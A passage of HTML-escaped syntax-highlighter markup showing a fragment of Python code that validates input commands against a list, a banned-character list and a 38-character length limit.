class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;in&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;works_list&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;keys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-124&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;in&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;work&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-125&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;invalid_cmd&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-126&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-127&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;not&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;invalid_cmd&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-128&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Invalid Work !!&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-129&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;continue&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-130&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-131&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ww &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;in&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;work&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-132&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ww &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;in&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;ban_list&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-133&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Found unavailable Character !!&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-134&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-135&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-136&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;work&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;38&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-137&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Too Long !!&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-138&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;continue&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-139&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-140&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;result&lt;/span&gt;&lt;span 